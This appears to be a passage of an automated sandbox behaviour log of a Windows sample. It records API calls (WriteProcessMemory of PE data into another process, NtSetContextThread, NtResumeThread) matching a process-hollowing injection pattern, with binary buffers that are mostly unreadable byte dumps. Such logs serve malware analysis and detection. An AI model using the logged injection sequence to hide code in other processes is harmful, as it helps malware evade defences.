 buffer: €0€ HXPhäh4VS_VERSION_INFO½ïþ?ÈStringFileInfo¤040904b1, CommentsWkLW Rjlr(CompanyNameJeq8FileDescriptionFtH TRx0FileVersion3.6.3.7: InternalNameYjFX Hxl.exez+LegalCopyrightCopyright 2020 © YPO. All rights reserved.2LegalTrademarksVkaDB OriginalFilenameYjFX Hxl.exe2 ProductNameYjFX Hxl4ProductVersion3.4.1.48Assembly Version3.4.1.4DVarFileInfo$Translation PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
base_address: 0x00435000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

 buffer: X 00 0+010;0E0¦0Ä0Ë0å0ñ0122K3W3¢3944y5T6?8¿8Ò9Ú9Z:;!=+=6=Ü=æ=ñ=­>í>!?+?6? `Î14<4{4’4¢4´4Æ4Ý4è4j55‘5£5µ5Ì5×5c6z6Š6œ6®6Å6Ð6R7i7y7‹77´7¿7p9:;:q:‡:—:§:Ç:å: ;ª<è?÷?0800+0¸0Ç0Ö0í0ÿ0¦1²1Æ1Ý1ï1!2,2M2\23333.393@3G3\3d3k3r3„33–33³3»3Â3É3Û3æ3í3ô3 444 424=4D4K4R5Y5o5y55–5ª5´5Ì5Ó5ç5î5ÿ566&6E6L6_6i66†6˜6¢6±6¸6Ð6Ý6ç6ö677+767W7i7©7»7Ñ7ã7!888N8f8¡8«8Â8Ø8é9ð9::!:(:@:L:h:o:Š:”:¤:«:µ:¼:å:ì:ý:;;%;9;F;R;Y;s;};„;;Ÿ;­;Õ;Ü;÷; <$<.<L<`<x<†<¢<´<Ã<Ö<ì<= ??I?]?d?Í?î?@$0,0N0»1Ø1ù1 232¸24(4L4]44š4Ë4A5G5T5¯5Ê5Ñ5Û5â5é5ñ5ø5 666,656?6F6M6Z6a6l6u6|6‰666¦6­6º6Á6Ì6Õ6Ü6é6ð677'7-747=7d7k7í7õ7ü7 888%8-848A8I8P8h8u88˜8¥8²8É8Õ8â8ø89(9/969U9j9:;:C:M:ò:;#;-;y;á;< <<<8<M<_<…<Ú<ö<1=H=‹=’=™=¥=¬=³=º=Ã=Ê=Ñ=Ø=å= >,>K>R>k>~>„>š>¦>«>±>K?T??˜?²?Ö?Ý?æ?ú?P r00†0‹0—0ž0¥0Y1h1w1í1 22+2;2H2T2e2t2ƒ2’2¡2°2¿2Î2Ý2ì2û2 3(3-3E3J3h3m33š3»3Þ3ã3³4º4×4é4 55!5(555=5I5P5a5i5q5x5˜5Ê5Õ5_<ü<Ì=>>F>K>X>Æ>ó>þ>?`?k?„?Œ?‘?ž?`P 000;0¸0Ñ0Ù0í12&202C2H2M2[2€2‡2£2½2 3Í4c68&8P8‘9#:Ò:Ç<==5=¼=>¿>£?¾?p, 0À455?5e5¬5N6©78‚:Š;Ã;à;ø;<ú<U=€„„0¦0ô2W3m3}3V5a6v6‰6“6À67~7ž7ü7S8Ú8æ899B9™9ý9::¾:Ä:Ú:á:ï:X;^;Ÿ;¥;»;Â;Î;Ú;!<^<â<è<þ<==‚=ˆ=É=Ï=å=ì=8>¶>Ã>ê>÷>?4?’?°?Ì?á?Ä 0$0<0T0l0„0œ0´0Ì0ä0ü01,1a1l11¤1©1³1Ý120262A2Ž2 3313D33—3Ë3Ó3è344;4k4s4—4Ÿ4ï4„66Ò6ß6ÿ67S7`7†7¢7¶7Â7Þ7æ788|89F9Ý9ˆ:£:;¯;<<Q<i<†<™<©<¸<Ó<ï<==='=7=[=¹=Á=‚>4?a?•?º?×?à?é?ò?û? |0 000(010:0C0L0+151­1 292©2¶2Å2÷263…3½3Ð3Ü3ö3þ34444i4‰4>5Š5’546’6 77g7o7_8s8‹8Â8Ê8Ù89V9z9´9»9Ð9å9:u:”:®:Î:K;°0Ì:¯;õ;<ž<ä<=§=Ë=>;>î>?&?E?­?Â?å?ÿ?Àx0¦0È0U1{1Ž1×1ã1ø12.2w2ƒ2˜2»2Î23#3M33²3Í3ø3#4N4y4¤4Ï4ú4#5J5s5ž5õ5 6˜8:9:;:¨:Þ:F<= =R=^=…=ø=G>[>‰>Î>?T?|??Ðhä0A1€1´1ç1$2T2‡2Ä2ô2'3d3”3Ç3484k4ë4ý5Z6™6Í67=7m7 7Ý7 8@8}8­8à89Q9„9:>;3<<Õ<!=>>u>?1?^?Û?ü?à<ï0º2]3ý5¥6ð6797x7¤7î78S8w8«8Ì8è89"9<9Z97<o>9?A?N?ð@ò1{33£3Í6ª7ñ9\:|:‹;Ÿ;³;†=’=ð=>>,>‡>“>ñ>? ?-?ˆ?”?ò?h0!0.0‰0•0ó01"1/1Ž1›1ê1þ12&2…2’2á2õ233x3„3 4ƒ::±:½:C;’;<=™=¥=ª=¯=´=¹=À=Ñ=î=û= >>%>9>>>U>,?4!6H7Æ7U8Ô8¥9à9‡:—;™<è<}= ?l?€?§?³? y0Ð1C2M2b2ü2›8"=0r<=¨=>Ô>à>@\…0à0ì0c1x1›1Å1ß1í122„3È34!4W4›4£4Ì4 5œ5À5á5÷56Y6Ü6ô6s7Â7q89¶:+;„;Ñ;2<—=Ñ=û=Ä?P A2 2`D}0Ð0]1d1­1´1ö13¥3¬3×3Þ34*4ƒ4Š4š4¡45„5‹5Æ6Í679>96<C<P<í<ô<pª=»=Ì=ƒ>>\?e?€p0¹778B8h8#98;æ;62F2v4}4 4Î3Õ34 474»4Â499þ;<m<s<€<*=<=W=B>U>b>®>µ>° ¨1¯1¤45m5M6Z6’8š8:µ:À G?k?Ð(1X1µ1¡2®2»2ž3ª3Ý3X7_79s=O>V>àY0ê4ñ4¦:¢;ø;)=H=ð(A3H3 4m5k7b9°<¾?Æ?Î?Ö?Þ?æ?î?ö?þ?¤0000&0.060>0F0N0V0^0f0n0v0~0†0Ž0–0ž0¦0®0¶0¾0Æ0Î0Ö0Þ0æ0î0ö0þ01111&1.161>1F1N1V1^1f1n1v1~1†1Ž1–1ž1¦1®1¶1¾1Æ1Î1Ö1Þ1æ1î1ö1þ12222&2.262>2F2N2V2^2f2n2v2~2†2Ž2–2ž2¦2®2¶2¾2Æ2Î2Ö2Þ2æ2î2ö2þ23333&3.363>3F3N3V3^3f3n3v3~3†3Ž3–3ž3¦3®3¶3¾3Æ3Î3Ö3Þ3æ3î3ö3þ34444&4.464>4F4N4V4^4f4n4v4~4†4Ž4–4ž4¦4®4¶4¾4Æ4Î4Ö4Þ4æ4î4ö4þ45555&5.565>5F5N5V5^5š56o6¿6 7>7E7K7y7®7µ7»7é78%8+8Ñ8 >>>/>6><>‡>Ç>Î>Ô>*?W?^?d?ö?ý?H0<1C1I1Ë2Ò2Ø254<4B4’4™4Ÿ4u8|8‚8ö:ý:;>;>E>W>a>°>¾>Ë>Ò>ú>?? 11161=1C1P4 ;¤;¨;¬;°;´;¸;¼;À;Ä;È;Ì;Ð;Ô;Ø;Ü;à;ä;è;ì;ð;ô;ø;ü;<<< <<<<< <$<(<,<0<4<8<<<@<D<H<L<`<d<h<l<p<t<x<|<€<== ===== =$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=€=„=ˆ=Œ==”=˜=œ= =¤=¨=¬=°=´=¸=¼=À=Ä=È=Ì=Ð=Ô=Ø=Ü=à=ä=è=ì=ð=ô=ø=ü=>>> >>>>> >$>(>,>0>4>8><>@>D>H>L>À?Ä?È?Ì?Ð?Ô?Ø?Ü?à?ä?è?ì?ð?p°L0P0T0X0\0`0d0h0l0p0t0¤6¨6¬6°6´6¸6¼6À6Ä6È6Ì6Ð6 77777 7::: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:€:„:ˆ:Œ::”:˜:œ: :¤:¨:¬:°:´:¸:¼:À:Ä:È:Ì:Ð:Ô:Ø:Ü:à:ä:è:€0 000$0,040<0D0L0
base_address: 0x00436000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0xfffde008
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4203603
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000007f0
process_identifier: 2576
1 0 0

NtResumeThread

 thread_handle: 0x000007f0
suspend_count: 1
process_identifier: 2576
1 0 0

NtResumeThread

 thread_handle: 0x00000294
suspend_count: 1
process_identifier: 7112
1 0 0

NtResumeThread

 thread_handle: 0x000002e8
suspend_count: 1
process_identifier: 7112
1 0 0

NtResumeThread

 thread_handle: 0x00000444
suspend_count: 1
process_identifier: 7112
1 0 0

NtResumeThread

 thread_handle: 0x000004a4
suspend_count: 1
process_identifier: 7112
1 0 0